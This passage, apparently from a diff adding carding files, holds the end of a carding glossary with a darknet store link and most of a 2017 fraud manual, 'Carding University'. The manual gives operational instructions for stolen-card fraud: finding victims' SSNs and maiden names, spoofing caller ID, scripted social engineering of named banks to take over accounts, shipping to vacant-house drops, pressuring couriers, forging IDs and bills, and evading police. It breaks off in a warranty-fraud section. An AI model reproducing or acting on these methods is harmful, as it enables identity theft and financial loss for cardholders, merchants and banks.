account. +RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and Adel'man, which +subsequently opened their own company RSA Data Sechurity, Inc., purchased recently by the company Security +Dynamics Technologies, Inc. +Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved for each +transaction in obtaining of instructions about the payment. Decrease the risk with the payment. +SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary purpose is to track +individuals for taxation purposes. +Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the calculations. +System risk - the risk, with which the incapacity of one of the payment system participants either financial market +participants as a whole to fullfill their obligations causes the incapacity of other participants or financial establishments +to fulfill its obligations (including obligations regarding the realization of calculations in means transfer systems) +properly. This failure can cause significant liquidity or crediting problems and, as result, it can cause loss to the stability +of financial markets (with the subsequent action on the level of economic activity). +Truncation - procedure, which makes it possible to limit the physical displacements of a paper document, in the ideal +version, by the bank of the first presentation, by the replacement by electronic transfer of entire or part of the +information, which is contained on this document (check). +Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card embosser) +COB - Change of billing. Used for online carding, to change the billing address of a card since Online Stores will only +ship large items if the billing and shipping address match. You can obtain these from vendors in CP. Once you have +this, you can easily change the card address to that of your drop so that the stores ship items to your drop, since the +billing and shipping addresses will match. +DOB - Date of birth of the card owner +DISTRIBUTED BY AllAboutCarding +For Credit Cards,Paypal Accounts,Bank Accounts and more tutorials check out my store +Evolution market: http://k5zq47j6wd3wdvjq.onion/store/34615 +Carding Vocabulary and understanding terms.txt[9/3/2014 1:01:52 PM] diff --git a/CardingUniversity_pdf.md b/CardingUniversity_pdf.md new file mode 100644 index 0000000..f34f246 --- /dev/null +++ b/CardingUniversity_pdf.md @@ -0,0 +1,1996 @@ +# CardingUniversity + + +--- + +Carding University +Fourth Edition +October 1st, 2017 +Written by G + +Carding University, Fourth Edition +Written by G, Moderator @ TCF, October 1st, 2017 +Table of Contents +Introduction +Chapter 1 – Virtual Carding +1.1How It Works +1.2- Account Take-Over Fraud +1.3- Why Orders Get Canceled +1.4- Drops +1.5- Chargebacks +1.6- Warranty Fraud +1.7- Picking The Best Cards +1.8- Commercial Fraud +1.9- Newegg And TigerDirect +1.10 – Stripe Cashout +1.11 - Beyond the ATO – The PTO +1.12 - Maxmind Fraud Prevention Algorithm +1.13 - Order Verification Procedures +1.14 - Stripe Automated Cashout +1.15 - CC to BTC +1.16 - Squareup Cashout +1.17 - Flint Cashout +1.18 - PayAnywhere Cashout +1.19 - Getting Asked For Photo ID +Chapter 2 – Protecting yourself +2.1- Protecting Yourself Online +2.2– Burner Phones +2.3- Spoofing Android Device – The Perfect Way +2.4- AVS +2.5- Flight Tickets +2.6- Spoofing E-mails +2.7- Completely Spoofing Your Identity +2.8- Safeguarding Your VPN +2.9- The 10 Most Common Mistakes +2.10 - Glossary +Conclusion + +Introduction +This guide was written by G, Moderator at TCF, after a long list of requests for making a guide. I'm an +experienced carder, carding tens of thousands of dollars worth of merchandise and rarely failing.I +share my knowledge for anyone who is ready to put a bit of money on the table and get some real up- +to-date carding information. +Now, at the time of writing, only a few select VIP members allowed to sell this guide. If you see +anyone selling my guide on EVO or anywhere else, let me know. I took time to write this guide, I +appreciate when people recognize my work. +Why am I not letting this information go for free? Simple. If we post good and working methods in the +open, all newbies will try to exploit them in any good and bad way possible, burning it before the pros +can start making money with it. So by asking people to pay for a complete guide, we ensure that those +methods will not burn in the long run. We strive to provide quality information! +This guide was written with the intention of helping people who are ready to invest some money to +make money. We can't let newbies registering and seeing top-secret methods in the newbie section of +the forums, as it would destroy everything. +The Stripe cashout method is the most popular one and is the one people make the most money with +because of its easiness when explained in that guide. On June 2nd, 2014, I made enough money with +Stripe to buy a brand new Mercedes-Benz with a suitcase full of money. Everything is possible, and +since your purchased that guide, you now have access to the elite carding methods. +I've always dreamt of becoming a millionaire in the real estate field. Everybody knows, to be able to +afford real estate, you need money to put as a cash-down payment. Tons of money. And I don't believe +in working 40 hours per week to bring home a mere $400 per week, minus all the bills, and count how +many pennies are left in my pockets. I believe in living rather than surviving. +And even with a real-life business, that's still not enough. This is where I discovered the world of +online fraud. I lost a bit of money in my early times beleiving that dumps + PIN actually existed, and +Mr. Fungi probably laughed at several people that way. Carding helped me, as a few other people, pile +up money and afford what we always wanted. +Carding is not all; a very lucrative field is payment processor cashout. I will detail 3 techniques +commonly used by fraudsters to increase their illegal income. Most importantly, when your things start +to go well and you see the money, do not brag to anybody! You never know when a friend will +threathen you to rat you out if you don't do a favor. I'm a legit-looking man, never smoked of my entire +life, only here to get some money. +After reading this guide, you will have the knowledge to card virtually anything. You can get free +computers, electronics, clothes, and much more. Since this knowledge can be very dangerous, I +encourage people to stay ethical in their doings. For example, avoid carding your local mom & pop +store, since they can barely eat losses. Go for the big fish, the ones who deserve it, like Walmart and +Newegg. They are cardable. If you failed many times at carding them, you have the right book. +There is no website considered “uncardable”. Everything can be carded with the right level of attack +(first chapter will talk about site attack levels from 1 to 4). I personaly carded every site that people + +thought were uncardable. Some were really hard, but if you “become” the cardholder, you will be able +to do miracles with fraud. At this date, not all online merchants are aware of credit card fraud. Some +will simply process every transaction that comes their way, while others have advanced fraud +prevention. This just gives us an extra challenge. +Some methods were found on the forum, then perfectioned and adapted to make it viable and cardable. +Most of the time, it is a game of cat and mouse, but there's a point where stores can't step up more +security without seriously compromising customer experience. We must take advantage of that, and +look like that customer who is confused about how he uses his card. +Life is short; if you have dreams, get the money to realize them! The cashout methods in this book are +here for this purpose and will give you a nice starting kick to get the financing for your projects. As for +the question “is it possible to life a life out of carding?”, the answer is yes, but I don't encourage it. I +recommend using carding and cashout to get money for legit projects, something that you can show to +society to make people proud of you. This is how you get people's respect, and this is how you get all +the girls. +Enough talking, let's get started! + +Chapter 1 – Virtual Carding +This chapter is about virtual carding. Virtual cardung is the art of ordering goods online using stolen +credit cards, also known as “CVV”, “pizza”, any any other names the members of the community use +to disguise their intentions. Although this seems easy, there are many pitfalls you might want to be +aware of when doing that, especially since merchants are getting more and more aware of online fraud. +Want to know how to get free goods? Let's get started! +Section 1.1 – How It Works +The first thing is to ask yourself, how much do you want to card, and what do you want to card? Then, +you will have to pick one of those 3 levels. Each level represents a difficulty level and you will see the +prerequisites. +Level 1: Easy carding +This level is used for very easy things to card, for example restaurants and small phone orders, mostly +under $50. This is the entry point of most carders. For that, you will need: +• Credit card number +• Expiration date +Level 2: Intermediate carding +This level is used for online transactions that are slighly higher, like background reports, or a very +small physical item. You will need: +• Credit card number +• Expiration date +• CCV code +• Cardholder name +• Full billing address +• Sometimes, phone number of the account +Level 3: Hard carding +This is not recommenced for beginning carders. Here we are talking about everything above level 2, +such as large physical items, or high-security websites like Newegg, TigerDirect, and sites that require +Account Take-Over (for ATO, see section 1.2 of this guide). Computer parts, electonics, and many +other items fall in this level. You need: +• Credit card number +• Expiration date +• CCV code +• Cardholder name +• Full billing address +• Phone numbers +• SSN +• DOB +• Recommended, background report +If you are aiming for level 1 carding, you just need to call for pizza and order pizza to another address, +no need to write lengthy paragraphs on this one. This is easy and is pretty straightfordward. + +If you are aiming for level 2, you can card background reports or small physical items, mostly under +$150. All orders are done online, and you will have to enter the correct billing address, shipping +address, and card information. +Now, you must see if the websites says billing phone number on file with the bank, or simply contact +phone number. If the website asks for billing phone number, you have to put the phone number on file +with the bank for the cardholder, otherwise it is safe to put your burner phone number (see section 2.1 +of this guide). Now, is the website going to call you? It depends on the order, their policy and their +suspicion about you, so there's no safe answer to this question. Remember that carding is often trial and +error. +When you use a card to hit a website, do not hit another website using the same card until your order +has shipped. Making an order go though and having a charge approval is easy, but getting it shipped is +often where the challenge lies. +A level 2 site that is often carded is peoplefinders.com. This is where carders get most of their +background reports. It is a good playground to test your skills, and will prove useful later. +Now, on to level 3. You probably saw the information required, now how to get it? First, if your subject +is aged under 40, chances are that you are out of luck. Otherwise, read on. +First, you need to get the right type of card. This is called finding the right BIN (Bank Identification +Number). The BIN is the first 6 digits on the card and is used to identify the card type as well as the +issuing bank. To learn more, go to bindb.com, at the top go on Bin Search, and enter the first 6 digits of +the card. They will tell you the issuing bank, and card type. You have debit and credit cards, and the +card type can vary. From the weakest to the strongest, they are: +• Secured: Very low limits, sometimes around $300 +• Classic: Low limits, sometimes around $1000 +• Gold: Average limits, can be around $3000 +• Platinum: High limits, can be around $8000 +• Business: Very high limits, in the 5 digits, often around $15,000 +• Signature: The best ones, I got cards that had $30,000 of credit limit +Note that those numbers are subject to change according to the cardholder's credit score, history, and +spending patterns. For the benefit of this guide, we will only work with credit cards. By experience, +debit cards often do not have funds, and have tighter security for online purchases. In other words, they +are rubbish for level 3 carding, but may have other uses, like level 1 or level 2 purchases. +Register an account on any SSN finder site such as ssnfinder.ru or ssndob.cc and look for your subject. +At the same time, go on peoplefinders.com and get the full background report of your subject using a +level 2 card. Once you have the background report, look if the addresses and date of birth match on the +report and on backstab. If everything matches, you can assume the SSN will be correct. Use your +common sense to compare the backstab and peoplefinders results to make sure you didn't get the wrong +information. About 80% of the subjects over 40 years old can be found. +You have the SSN and DOB? Great! Now, time to get the mother maiden name. This is slightly harder +and will work if your victim is in one of those states: Arizona, California, Delaware, Idaho, Indiana, +Kentucky, Maine, Maryland, Massachussetts, Minnesota, Nevada, New Hampshire, New Jersey, Ohio, + +Rhode Island, South Dakota, Texas. Go on archives.com and card an account, then look for your +subjet's mother (look at the background report for her name and date of birth), and try to look for her +birth record. This is a trial and error case and works about 50% of the time. +Why get all this information? Because many level 3 sites will have either VBV (Verified by Visa) or +MCSC (MasterCard Secure Code) protection during checkout. This is a form that is presented by the +issuing bank of the credit card and asks for additional questions. Although every type of card is +different, the commonly asked questions are: +• Date of Birth +• Last 4 digits of SSN +• Full name on card +• Billing zip code +If you fail any of those questions, the order will not go through. Now, why did we need all this +information? Because we will perform a ATO on the account. This is tricky. Read the next section for a +detailed description of Account Take-Over fraud. +Section 1.2 – Account Take-Over Fraud +Do you dream of carding thousands of dollars worth of computer hardware on Newegg? It's doable, but +not easy. You have to follow the right steps. I carded a $10,000 gaming rig in under 2 weeks using +platinum cards by following that guide, so I'm in position to tell you how. +First thing, check the balance of your credit card. Now, before going crazy, remember this rule of +thumb: Do not use card checkers! They burn the card very quick. Let me explain. +Every transaction automatically gets a fraud score between 0 and 999. The system used to evaluate +transactions is the same used by the big 4 banks and is called Fair Issac. Transactions having a fraud +score over 300 will hit manual review by an agent, who will decide if they contact the cardholder or +just let it though. Scores over 500 with auto-decline, block the card, and an agent will contact the +cardholder. Some banks have different criterias, but things that can affect the fraud score are: +• Comparison with the usual spending pattern of the cardholder +• Location of the charge +• Amount +• Risk factor of the associated merchant +For example, a $20 charge in the cardholder's local Walmart will not trigger anything, but a large +purchase of $2000 on Newegg.com will have a high fraud score and probably auto-decline if the +cardholder rarely makes online purchases. +So how is this relevant? A small card-not-present charge followed by a big charge will make the fraud +score very high, because they assume you are testing the card. If they see a small $1 charge, then a few +minutes later a large purchase online, they will auto-decline the card and your plan will likely fail. +There are much better ways to check if a card works. The best way is to call the bank's toll-free number +and use the automated prompts. This brings no danger, however use Spooftel to spoof your number to +display the cardholder's number. Once you do that, you are ready to call the issuing bank's number and +check how much is left on the card. Let's get to it. + +Call the bank using your burner phone and have in hand the following information, according to the +bank. The automated prompt will give you access to the transaction list, balance, and a few other +options. Here is the information for the biggest 4 banks: +Chase Bank – 1-800-432-3117 +• Full card number +• Zip code +Note: If you correctly spoofed the phone number, you will only be asked for the last 4 digits of the +card, otherwise you will be asked for the full card number. +Citibank – 1-800-627-3999 +• Full card number +• Last 4 digits of SSN +Bank of America – 1-888-421-2110 +• Full card number +• Zip code +Capital One – 1-800-955-7070 +• Full card number +• Last 4 digits of SSN +If, for any bank, you enter the card number and the system immediately transfers you to an agent +without additional questions, it means the account is closed and the card is burnt. No need to waste +time on this one, just hang up and use another card. The agent will only tell you the same thing, and +you will look dumb. +It's always a good practice to take note of the last transactions and amounts, just in case you get asked +for them later. Listen to them and write them down, I recommend up to 8 transactions for maximum +safety. +So you have the balance and the available credit line now. Nice! So you know how much you can +spend online. Before you go crazy though, there is one more obstacle you need to be aware of: many +sites like Newegg or TigerDirect refuse to ship to an address that is not on file with the bank. And +chances are that your cardholder does not reside at your drop address. Here is how we will solve this +problem, introducing the Account Take-Over fraud, also known as ATO. +ATO is the process in which a fraudster (you) calls the bank to make whatever changes he wants to the +account, without the cardholder knowing. This involves speaking with a customer service agent and +using social engineering. Before you even think about pressing 0 to speak to an agent, make sure you +have, at the very least, the following information in hand: +• Full card number, expiration date, CCV code +• Full billing address of the cardholder (and county) +• Date of birth (and write down the age too, not just the DOB) +• SSN +• MMN (Mother Maiden Name) +• Employer name (facultative, if possible, try to find it on Facebook) + +• Car make and model (facultative, if possible, try to do a Google StreetView on the CH's house) +• House size and value (facultative, if possible find it in realestate.com as this is public +information) +• Driver's license number, expiration, state (facultative) +• Previous addresses +• Background report +In case you do not have the MMN, try to guess using common last names in the background report. If +you really cannot find it, sometimes it is possible to get around it with other questions. Once you have +this information in hand, study it, try to remember it. Remember, you are the cardholder, the card is +yours, and you are confident, just like when you call your own bank for a legitimate request. +When you call the bank, you will be usually asked for 3 security tokens. Those tokens can be, but are +not limited to: DOB, SSN, Address, CCV code, cellphone, MMN. If you fail 1 token, you will be asked +2 more. At this point, 2 things can happen: +1. You did it correctly, so the agent will listen to you and will do whatever request you have to do +on the CH's account, and no flags will be raised. +2. The agent suspects an ATO is occuring, and transfers you do the securiy department. This is +called the Verid department, and you will be asked 2 OoW (Out of Wallet) questions. Those are +multiple-choice questions based on the cardholder's credit history and public records. They can +be easy or tricks, it's random every time it happens. If you fail those, they will tell you that they +can't help you and will suggest you show up in person at your bank. They will also ring the +cardholder. So if you fail this one, forget this card, it's burnt to a crisp. +The first thing you want to do on the account is change the billing phone number. Only that. Do +nothing else, as making too many changes will raise a red flag on the account. Call to change the main +billing number and let the card sit still for at least 5 days. +All right, are you ready? Relax, sit in your favorite couch, call the bank, listen to the prompts, and press +0. The message goes on, this call may be recorded for quality purposes. +This is the first example, if you have the correct MMN (this is the most frequently asked token). +Agent: Thank you for calling Chase, my name is Bob, who am I speaking with? +You: James R Layton. +Agent: Thank you mister Latyon, and for security purposes, may I have the mother's maiden name on +the account? +You: Lucile. +Agent: Thank you, and what is your date of birth? +You: October 1st, 1965. +Agent: Thank you mister Layton, what can I do for you today? +This is the second example, if you do not have the MMN. Guess it, and do not hesitate. You know +yourself better than the agent does, and they can only rely on the information they have on their screen +to validate your answers. +Agent: Thank you for calling Chase, my name is Bob, who am I speaking with? + +You: James R Layton. +Agent: Thank you mister Latyon, and for security purposes, may I have the mother's maiden name on +the account? +You: Smith. +Agent: I actually have something different here, it starts with C. +You: With C? It's impossible! Her name was Lucy Smith, she never used any other name! +Agent: Well, you do not have any other name that might start with C? +(if you have a last name starting with C on the background report) +You: My aunt's maiden name is Charlotte, but I doubt that's the answer you have on file. +(if you have nothing like that on the report) +You: No, no one in my family uses such a name. +Agent: Oh well, let me take note of this for you, can you confirm the last 4 digits of your social security +number? +You: 4456. +Agent: Thank you, and what is your date of birth? +You: October 1st, 1965. +Agent: And you billing address with the zip code? +You: 123 Fake Street, Fakeville, NY, 10008. +Agent: Thank you Mr. Layton, how can I help you today? +If you hear that, it means you got in. Otherwise, you will be transferred to the security department for +the multiple-choice questions, have your report in hand. If you fail, the card is dead. Make sure you +spoofed the cardholder's number, otherwise you could be asked for other questions like driver's license +number, vehicule plate number, etc. Those are questions you probably do not have the answer to. +Now, what you want to do is change the billing phone number. A sample dialog with the agent can go +as follow. +You: I would like to change my phone number. This phone will be disconnected tomorrow and I want +to give you my new primary number so you can reach me if there is something. +Agent: Okay I see, what is the number? +You: 234-567-8901. +Agent: Thank you, is there something else I can do for you? +You: No thanks. +Agent: Thank you for calling Chase, have a wonderful night. +Once you passed the verification part, the rest is pretty straightforward and is relaxing. Now that you +changed the billing number, let the card rest for at least 5 days. Do not make any transaction. The +cardholder will continue to use his card normally too. During your call, at the end, if you failed the +MMN question, you might want to remind the agent to change the MMN on file to avoid problems next +time you call. +Also take note, at any point, if the agent wants to put you on hold, or says he needs to verify something +and will be back, wait for him to put you on hold, and hang up. It basically means they are going to +ring the cardholder. If this happens, you might want to wait at least 48 hours before calling again, and +you will see just by the automated prompts if the card is burnt or not. Maybe they did not call the +cardholder, but in 90% of the cases, they did. It happens, especially with Citibank, who likes to replace +the Verid questions by a quick ring to the cardholder. + +The questions often change when you call, but they always follow a certain pattern. By experience, I +will give you the tokens usually asked by the big 4 banks, but we aware that they might change, or they +might ask you other questions if they believe you are bogus. They can ask for your age to throw you +off, as you might not have to calculate it fast enough using the DOB. If you fail this verification, you +will be transferred to Verid department. +Chase Bank, level: hard +• Full name +• MMN (if failed, last transaction) +• Last 4 of SSN +Citibank, level: medium +• Full name +• Password (pet name, MMN, favorite hobby, or best friend, if failed, last 4 of SSN and CVV) +• Mailing address +• Phone number +Bank of America, level: easy +• Full name +• (sometimes) Verbal password, which is MMN (if failed, DOB) +• Last 4 of SSN +Capital One, level: medium +• Full name +• Last 4 of SSN +• MMN (if failed, DOB and mailing address) +Since you have to wait 5 days, it's a good idea to create an account on your target website, browse the +items, put some in your cart, go to checkout, go back, remove items, read descriptions. Just try to +appear like a legitimate shopper. Remember that $1000 is a lot of money for the average American and +if you show you don't care about your money and just throw items in your cart, you raise flags. Look +like you care about how much it costs. +There is also a technique that works well with Citibank: when you are asked for the MMN by the +automated system, if you fail, you will hear “the agent might need to ask you verification questions”, +and if you succeed, you will be connected and everything will be a breeze. When the automated system +asks you for the password, say “Jope” while putting a high tone on the O sound, then slightly lower +your pitch. Say the word at normal speed, like when you are talking to someone. This will trick the +automated system into beleiving that you got it right. You might have to retry 2-3 times for it to work, +but I got it with almost all my accounts. This will save you a lot of hassle with the agent and will make +the call extremely easy. +Once you got rid of this verification process, it will be easier next time you call the bank for this +account. So let's suppose you followed me and let it sit for 5 days. Call again, and this time, we will +add a temporary shipping address to the account. A transcript can go as follow: +(pass verification questions) +You: I want to make a purchase from Newegg.com but they ask me to add a temporary shipping + +address on file. I'm not sure how that works, do I just tell you where I want them to send my order? +Agent: Let me help you with that, we can add an alternate address on the account, what would be the +address? +You: 123 Fraud Street, Cardingville, CA, 98765. +Agent: No problem mister Layton, I have notated the account for you, is there something else I can +assist you with today? +You: No thank you +Agent: Have a good afternoon. +Almost all banks allow that, except Bank of America, who can only change the mailing address. That's +why their cards are not the best when it comes to level 3 carding, but some stores will do a conference +call with the bank to bypass this restriction. Chase works the best for temporary shipping addresses, but +is hard to ATO. It all depends on your skills and what you're comfortable with. All US banks accept a +Canadian address, and some banks may accept an international address. +Once you have added the alternate address in the account, it's time to make the hit. Take your account +on the website you want to card, shop a little bit again, then proceed to checkout. Try not to go over +$2000 per order. Enter the correct billing address, double-check the information. Enter the billing +phone number (the one you added on the file at the bank), then your shipping address. Triple-check all +the information for accuracy. +Then, send the order. You might be greeted by a VBV or MCSC form, but if you have the required +information, it should not be a problem. Enter the information they want to get, and submit the order. +Also, some websites like TigerDirect will ask you for your DOB and will give you 3 verification +questions to answer. Those are public records and can easily be found in your background report, so +don't be scared. If you fail 1 question, you will be asked an additional question. If you fail 2 or more, +the order will be put “on hold” and things will get harder, so try not to fail. +At this point, 2 things can happen when you submit the order. It depends on the spending habits of the +cardholder, and will make things easier or harder for you. +1. The order goes through without any problem, and becomes “pending” status. +2. The transaction get declined and the website says to call the issuing bank. If this happens, call +the bank, the system will act like the card is burnt (transfer without any additional questions), +and a fraud agent will answer. Remember, the card is yours, tell them you authorized the +transaction, but you don't know why it's declined. It's usually easy if you have the correct +information, but if you ATO'd the account before, chances are that you have everything it takes. +When the agent tells you you are all set, resend the order on the website. Call as soon as you get +the decline, don't wait, otherwise the real cardholder will get a call you don't want him to get. +All right, the order is now sent and the status is “pending”. The next section will tell you why some +orders get canceled (newbie mistakes), and why in your case everything should be all right. Take a deep +breath and hop to the next section. +Section 1.3 – Why Orders Get Canceled +When a website receives an order of about $1000, we understand that they try to protect themselves. +What is the first thing that a website will do to verify the order? That's right, they will call the issuing +bank and will check if the billing phone number you entered is correct, otherwise they will ask for it, + +and will ring it. You can receive the call, or the cardholder will, depending if you ATO'd the account +correctly. +This is why orders get canceled when newbies enter a credit card order and expect to receive a free +iPhone from the Apple store. They are not fools and want to protect themselves. However, if you took +care of changing the billing number on file, you will get the call and you will be able to confirm the +order. +Not so fast, a call is not simply “is everything okay?”, but rather a verification call where they want to +see if you are really the cardholder or not. They sometimes ask you for verification questions similar to +Verid questions, but all the questions are taken from public reports. They can also ask you if you put +the shipping address on file with the bank (you hopefully did), and they will call the bank to verify. +Also, in some rare cases, they can make a conference call with you and the bank, but you will be asked +for the usual questions, which means last 4 of SSN, DOB, last transactions, etc. +If you are a newbie and just put some credit card information on a website hoping to get a free iPhone, +you will just see the order passing to Canceled state without any details and you will not even get a +call. This is the reason why people post threads about “carding does not work” and get the same +answers. +If you passed the verification call, the representative will tell you that everything is okay and that they +will have the order shipped out today. This is good news! At this stage, I received 100% of my items, I +never had problems past the verification stage. Now you may be tempted to hit another site; resist to +the temptation. You ATO'd card can almost be considered a level 4 card, at you own the account and +can do whatever you want, so it has a high sentimental value. Wait for the order to ship and the package +to leave the merchant before you hit another webstore. +I recommend carding in the morning, to avoid letting a charge sit on the card for too long. You never +know how often a cardholder checks his statement online. I had cards that died within hours, and other +ones lasted 3 months. Once the package is shipped, you can card another store, no need to call the +bank, as your drop address is already on file. Repeat until the card is burnt. Once it is burnt, never show +your face at the drop again. The alternate address is on the bank's records and they can send Law +Enforcement to this place. A drop is like a condom, use it once, do all your business, and trash it, +because it becomes dirty. +Another verification step they can take is send you an e-mail asking for scans of your ID documents, +such as passport and driver's license. These can easily be photoshopped and there are templates +available everywhere. Utility bills are pretty easy to forge too, so don't worry about this part. Do what +you have to do, but be quick. +Another step you can take, is to put the shipping name on the package to a family member of yours, for +example if the cardholder's name is James Latyon, send the package to a certain Harry Layton (find a +name that's on the report and have their DOB, in case) and say you are sending the package to your son +/ brother / whatever relationship you have on your report. +Also, keep in mind that no method is perfect, and the website can cancel the order simply because they +feel it is not safe to process it. Nothing is perfect, but if you ATO'd the account successfully, it should +be easy. Remember to stay under $2000 per order. You never know what other tricks they may use to +catch you. + +Always choose the fastest shipping method. Some say it raises flags, but if you did everything else +correctly, that will not be the reason why your order fails. Besides, it greatly reduces your chances of +getting an intercepted package, which is a pain in the ass and makes your efforts worthless. +This brings me to the topic of finding a drop to ship your order to. You can ship it to your house +without any problem, if you want the police to knock at your door and make you ride dirty to the police +station, and get in a steaming pile of shit of trouble. So read on to find out how to ship your order +safely. +Section 1.4 – Drops +A “drop” is a place, or location, where you have illegal, carded, or stolen goods shipped to. It has to be +a place that has no link with your current life and is in no way linked to you. +Finding a drop is not really hard. You can go on Craigslist and find houses for rent, or just drive around +your neighborhood looking for houses for sale where you can ship goods to. Make sure the house has +no big windows that allow the driver to see that the house is empty. You don't want to have the package +returned to the sender because of that. Just use your brain to find a decent house that you think is worth +shipping a package to. Usually pick a town close to yours, but not in your neighborhood. +The big day has come: UPS tracking shows “Out for Delivery”. Yeah! Now check if the package +requires a signature. All carriers require it, except UPS. For UPS, you can see if Signature Required is +written on your tracking page. If nothing mentions a signature, or if you are not sure, then signature is +not required. +Method 1: Acting like you are away +If you don't need a signature, you can leave a note on the door, “we are away, please leave package +here, take this as my signature” and you might as well print the order confirmation page showing the +tracking number and put it with your note to make your case stronger. The driver makes the final +decision about leaving the package or not, but usually there is no problem with UPS when they don't +need signature. Sign the note, put the order confirmation page with it, stick it in the door, and wait in +your car not far from the place. When the driver leaves the place, grab the package, and put it in your +car. Then skip method 2, and continue reading. +Method 2: Acting like you own the place +The second method is when a signature is required. You will have to meet face to face with the driver. +Remember one thing, you can relax. The driver's job is not to investigate fraud, but only to make sure +the package does to the right received. So you must just make him believe the package is yours, they +don't care about fraud (but don't be stupid and talk about your crime). Carry a printout of the order +confirmation page, the tracking number open on your smartphone (use VPN!), and look like you've +been waiting for him. You might wait at the drop, sitting on the front lawn, or doing whatever you +want. However keep in mind that waiting in the car when the driver sees you get out of the car is highly +suspicious. If you choose to wait at the drop while being visible, take down any “for sale” or “for rent” +signs, and call the bank's automated system prior to showing up to ensure the card is still valid and the +police is not waiting for you. Greet the driver, show papers, sign the cardholder's name, and proceed to +the next section. + +Sometimes, the driver might get cocky and ask, why your name is not the same one than what's written +on the package, or why you're not inside. You can tell that you recently moved, and you put it under +someone else's name because you have “problems with customs”. When they get cocky, you can threat +them to make a complaint at their local UPS hub, they usually calm down and hand over the package. I +had a cocky driver in my last carding trip in Minnesota, and I had to use this method, and I finally got +my package. +By experience, when you have brokerage fees to pay (like international package), you can call UPS +before getting the order and ask the amount. Leave a money order on the door and the driver will take it +and leave the package. You will avoid getting a InfoNotice that way, and the driver will believe you +own the place. I did that a lot of times and no failure so far. +Picking your package at the UPS facility +In some unfortunate circumstances, the package can end up at the local UPS facility and will require +government-issued ID to be picked up. This happens if you missed your drop, for example. In that case, +don't bother making a fake ID, as there is a better trick. +The package is usually held for 5 business days before it is sent back to the sender. The day the package +arrives at the facility is day 0. Two scenarios can happen: +Scenario 1: You get a call from the UPS branch +They will probably call you and say something along the lines of, we have a package for James +Fakename waiting at the facility for pickup. Just tell them that you don't know this person. Here's a +sample script of what it should look like: +UPS: Hello, may I talk to James Fakename please? +You: I think you may have the wrong number, who is speaking? +UPS: This is the UPS branch, we called the phone number we had on the package. +You: Oh, I was waiting for a package too, and it didn't get delivered. Is this a package from Newegg, a +smal box? +UPS: Yes, we have one small box waiting here, for James Fakename. +You: I have a tracking number, can you check if the last 4 digits are 3382? +UPS: Yes they are. +You: I'm very surprised, because my name is Fake Name and I was waiting for this one. I have no idea +who James Fakename is. They looked confused when I placed the order too. +UPS: Well, the package will be sitting here, just come pick it up when you are ready. +This worked me twice. I had 2 drops to watch at the same time and I missed one package. This allowed +me to pick it up. +Scenario 2: You do not get a call +On the morning of day 5, call the toll-free number and ask to be transferred to the local branch. You can +do the same scenario, and inquire about a package waiting there for you. You must look confused a bit +in your voice and look like someone who was victim of a mistake from the online store, and they will +gladly hand over the package to you. Everytime I did it, I never got asked for any form id ID and it was + +all smooth. +Do not give your real name. Test the card before going (call the bank), and only do it if the card is still +live, otherwise it can be dangerous. You can also send a mule if you are too afraid, but I showed my +face a few times when the card was still live and never ran into issues. +After getting your package +I sometimes skip this part when I am lazy, but you should be extra careful. Your freedom has no price +tag, so take 5 more minutes to do this precaution. +Drive to a nearby park or public place, and open the cardboard packaging. Look for any device that +may be tracking your position, such as bugs, GPS devices, etc. Then destroy the shipping label (you +can burn it to make sure), throw the cardboard packaging away, and you now have in your hands a +precious item you carded using your ATOd card. Also burn the order confirmation page if you decided +to go this route and you brought it to the drop! At this point, you can consider your carding heist a +“success”! Drive home, relax, you owned the bank and the website. You can brag about it on the +forums with reason. +If the card is still valid and there was no tracking device, you can card to the same drop again until the +card burns. Get as much as you can out of it. Burn the card to a crisp. I remember getting $10,000 +worth of electronics on a Chase card at the same drop, split on 5 orders. This was a money-making +week. +All right, you carded the item, ATO'd the account, got items, more items, burnt that drop to a crisp too, +now the card is dead... either over the credit limit, or flagged by the cardholder. Never show your face +to that drop again, and enjoy your goods! +What happens after? Read on to find out. +Section 1.5 – Chargebacks +A recurring question on the forums is, when the card is declared stolen and the transaction is disputed +because of fraud, who takes the hit? +In the case of a card-present transaction using chip & PIN in countries where they use that technology, +the bank takes the hit when the transaction is declared fraudulent. +In all other cases, it's the unfortunate merchant that takes the entire loss. So if you card Newegg for +$2000, they pay about $1600 for the merchandise that they send you, and they are short the money +because you carded them, so they have to make 6 similar big orders without problems to cover that +loss. You now undertand why they make verifications and don't want to be carded. +Some big merchants like TigerDirect and Newegg will just eat the loss and assume that they failed at +fraud detection, but smaller merchants will make a formal complaint at their police department. Now, is +the police going to investigate? It depends. + +If a merchant reports a $200 loss for an order shipped out of state using a stolen credit card, there is a +99% chance that the police will not even open an investigation for that. However if they report a $3000 +loss using a stolen card from the same state and shipped in a nearby city, LE (Law Enforcement) might +move for that. +It also depends on the volume of complaints, the amount of loss compared to the size of the city, and +whether there is an obvious pattern between fraud complaints or not. You should try to make your +orders not linkable to each other, and use your common sense to avoid creating a pattern that might +trigger an investigation. +It also depends if the cardholder himself decides to make a complaint or not. As long as they get +refunded by their bank (which they do), chances are that they will not care and just forget all that. But +some more mad people can decide to make a police report for identity theft. Again, there will be an +investigation if there is an obvious pattern. It all depends which city you are talking about. +So remember, when you card a website, they take the loss in case of a chargeback, so they want to +protect themselves. You have to be smart and ask yourself, if I were in the shoes of the website owner, +how would I catch fraudsters? +Sometimes, you might receive an e-mail from the store asking you to provide more information about +the chargeback, such as authorization forms or documents. Just ignore that e-mail. Do not become +cocky and answer “I got you!” because it could be the difference between an investigation or not. Keep +it dead. +Section 1.6 – Warranty Fraud +A very fun type of virtual carding is warranty fraud. I got some $1000 CPUs from Intel and +motherboards from ASUS using that trick. Here's how it works. +Many companies, especially electronics, offer what is called “advance RMA”. This is a type of +warranty replacement where the company sends you the new product first, along with a return box for +you to return the defective item to them. They sometimes ask for a credit card number in order to make +sure you will return the defevtive item. This is where we can take advantage of the system. +It works will Dell, Intel and ASUS, perhaps a lot of other ones, but they are the ones I have experience +with so far. You can PM sellers on eBay to ask for serial numbers of products, or you can simply card a +product and request a RMA using its serial number. Call the manufacturer, say that your product is +defective (use a diagnostic that makes sure it's really this product that is faulty, such as “the video card +shows nothing on the screen, I tried 2 screens, but it works with other video cards”, and ask if they +offer advance RMA, they mostly will. Use a level 2 card and have it shipped to your drop address. If +they ask why, just tell them you are on vacation there and your computer broke. +When you receive it, take the 